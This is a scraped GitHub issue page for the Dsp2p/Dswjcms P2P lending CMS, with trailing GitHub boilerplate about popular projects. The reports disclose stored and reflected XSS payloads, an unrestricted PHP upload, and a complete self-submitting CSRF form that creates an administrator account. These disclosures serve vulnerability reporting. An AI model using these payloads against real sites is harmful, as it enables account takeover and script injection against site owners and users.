Dsp2p是针对个人和个人的借贷推出的免费p2p开源项目,基于Thinkphp架构的行业系统,全自动安装模式,快速搭建P2P网站。(Dsp2p is personal and individual borrowing free p2p open source projects, based on Thinkphp framework of industry system, fully automatic installation mode, fleetly p2p web site.)
Home Page: http://www.dswjcms.com
PoC:
<img src=x onerror=alert(/xss/)>
Add an article
Execute JavaScript code
有视频可以看,怎么搭建部署吗?我在win7上怎么部署比较好?
After the administrator user logged in ,open the following page that can add a administrator user
Exp:
<html>
<body>
<form id="csrf" name="csrf" action="http://127.0.0.1/index.php/Dswjcms/User/tfAdd" method="POST">
<input type="text" name="q" value="am" />
<input type="text" name="u" value="%2Findex.php%2FDswjcms%2FUser%2Fmanage.html" />
<input type="text" name="username" value="admin3" />
<input type="text" name="email" value="[email protected]" />
<input type="text" name="password" value="admin3" />
<input type="submit" value="submit" />
</form>
<script>
document.csrf.submit();
</script>
</body>
</html>
Upload PHP File
Document content:<?php phpinfo();?>
后台 页面是CSS 错位了
后台 添加 担保 LOGO图片上传 无效。
PoC: "><script>alert(/xss/)</script><a
Add a Friendship Links
Execute JavaScript code
Recently, our team found a reflected cross-site scripting (XSS) vulnerability The vulnerability logic is present in the file:
https://github.com/tifaweb/Dswjcms/blob/master/Public/editor/php/demo.php#L45
The echo directly outputs the parameter $htmlData without any sanitization, which comes from the POST parameter $_POST['content1'] in L7. This makes it susceptible to Cross-Site Scripting (XSS) attacks. As a result, attackers can exploit this vulnerability by injecting malicious html code with $_POST['content1']. To fix this vulnerability, we recommend that developers implement properly sanitization (e.g., htmlspecialchars()) for user input before displaying it on the webpage.
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
Django
The Web framework for perfectionists with deadlines.
Laravel
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft
Open source projects and samples from Microsoft.
Google
Google ❤️ Open Source for everyone.
Alibaba
Alibaba Open Source for everyone
D3
Data-Driven Documents codes.
Tencent
China tencent open source team.
